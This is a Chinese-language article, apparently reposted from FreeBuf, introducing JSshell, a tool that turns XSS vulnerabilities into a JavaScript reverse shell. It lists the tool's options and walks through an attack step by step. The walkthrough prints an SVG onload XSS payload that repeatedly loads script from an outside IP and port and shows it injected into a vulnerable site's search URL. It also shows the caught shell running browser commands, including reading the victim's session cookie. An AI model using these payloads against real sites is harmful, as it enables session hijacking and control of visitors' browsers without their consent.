专栏首页FreeBufJSshell:一款针对XSS漏洞的JavaScript反向Shell

JSshell:一款针对XSS漏洞的JavaScript反向Shell

JSshell是一个JavaScript反向Shell工具,该工具可以帮助广大研究人员远程利用XSS漏洞或扫描并发现XSS盲注漏洞。当前版本的JSshell支持在Unix和Windows操作系统上运行,并且同时支持Python2和Python3。跟JShell(一款由s0med3v开发的通过XSS漏洞获取JavaScript反向Shell的工具)相比,这是一个非常大的更新,而且JSshell还不需要Netcat的支持,这一点跟其他的JavaScript Shell也有很大的区别。

工具下载

广大研究人员可以使用下列命令将JSshell项目源码克隆至本地:

git clone https://github.com/shelld3v/JSshell.git

工具使用

生成JS反向Shell Payload:-g

设置本地端口号,用于监听和生成Payload(默认设置为4848):-p

设置本地源地址,用于生成Payload(JSshell默认将使用设备IP地址):-s

设置shell连接的超时时长,如果用户退出页面,shell将会暂停,如果设置了超时时长,那么在一段时间无响应之后,shell将会自动关闭:-w

拿到Shell之后,执行命令:-c

快速使用样例

js.pyjs.py -gjs.py -p 1234js.py -s 48.586.1.23 -gjs.py -c "alert(document.cookie)" -w 10

JSshell运行样例

接下来,我们将给大家演示如何一步一步使用JSshell来利用XSS漏洞。

首先,我们将生成一个反向JS Shell Payload,并设置shell超时时长为20秒:

~# whoamiroot~# lsREADME.md   js.py~# python3 js.py -g -w 20 __|(_  _ |_  _  |  |\_|__)_> | |(/_ |  |v1.0Payload:<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>Listening on [any] 4848 for incoming JS shell ...

接下来,将生成的Payload拷贝到存在XSS漏洞的网站(或URL)中:

[https://vulnwebs1te.com/b/search?q=](https://vulnwebs1te.com/b/search?q=)<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

访问目标页面,接下来我们将看到已经成功拿到了反向JS Shell:

__|(_  _ |_  _  |  |\_|__)_> | |(/_ |  |v1.0Payload:<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>Listening on [any] 4848 for incoming JS shell ...Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848$ established$ the$ shell$$$ helpJSshell using javascript code as shell commands. Also supports some commands:help                  This helpexit, quit            Exit the JS shell$

现在,我们就可以执行某些命令了:

$ var test = 'hacked'$ alert(hacked)$

运行之后,浏览器将弹出一个警告信息:hacked

$ prompt(document.cookie)$

浏览器将会打印出用户Cookie信息:

JSESSION=3bda8...$ exit~# whoamiroot~# pwd/home/shelld3v~#

项目地址

JSshell:https://github.com/shelld3v/JSshell

*本文作者:Alpha_h4ck,来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf),作者:Alpha_h4ck

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-07-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 研究人员找到禁用Intel ME组件的方法(乡村故事版)

    本文试图以故事形式还原PositiveTechnologies公司找到禁用IntelME组件方法的消息,祝各位阅读愉快。 (1)清晨鸡鸣响彻天 ? 喔喔喔~喔喔...

    FB客服
  • 真实网站劫持案例分析

    1. 概述 上段时间一直忙于处理大会安全保障与应急,借助公司云悉情报平台,发现并处置几十起网站被劫持的情况。对黑客SEO技术颇有感觉。正好这段时间有时间,把以前...

    FB客服
  • 利用白文件打造超级渗透测试后门程序的思路分享

    计算机中的后门程序,品种多样。有Telnet、IFEO 、WebShell、注册表、Radmin等。大部分后门都会在一段时间内被AV检测到,并清除。通过修改木马...

    FB客服
  • Laravel5.1 框架路由基础详解

    本文实例讲述了Laravel5.1 框架路由基础。分享给大家供大家参考,具体如下:

    砸漏
  • 从SAP最佳业务实践看企业管理(111)-采购5R原则

    一、是适价(Right Price) 价格永远是采购活动中的敏感焦点,企业在采购中最关心的要点之一就是采购能节省多少采购资金,因此采购人员不得不把相当多的时间与...

    SAP最佳业务实践
  • FDsploit:文件包含路径回溯漏洞的挖掘枚举和利用

    FDsploit可自动化的为我们发现和利用本地/远程文件包含及目录遍历漏洞。如果发现了LFI漏洞,可以使用--lfishell选项来进行利用。目前,支持以下3种...

    FB客服
  • Struts2第四天:Struts2的拦截器和标签库

    n Interceptor:拦截器,拦截是客户端对Action的访问。更细粒度化的拦截。(拦截Action中的具体的方法)。

    AlbertYang
  • Struts2拦截器

    拦截器分类:1) struts框架自带拦截器: sturts-default.xml文件中里有多种拦截器如params....

    HUC思梦
  • 明道软件任向晖:平台的未来,就是尽量多地服务客户

    在此次中国 SaaS 产业峰会上,明道软件的CEO 任向晖也出席了圆桌讨论,与大家分享了明道的当前发展情况以及未来规划。 ? 身份关键词 明道已经做了很多年平台...

    人称T客
  • 机器人Curly也能玩冰壶了,堪比专业运动员!

    机器人已经在各种运动和活动中都表现出了卓越的能力,不过它们更擅长单独执行任务(而非团体合作)。幸运的是,有些运动如冰壶,主要由一系列的单人任务组成,韩国研究人员...

    大数据文摘

扫码关注云+社区

领取腾讯云代金券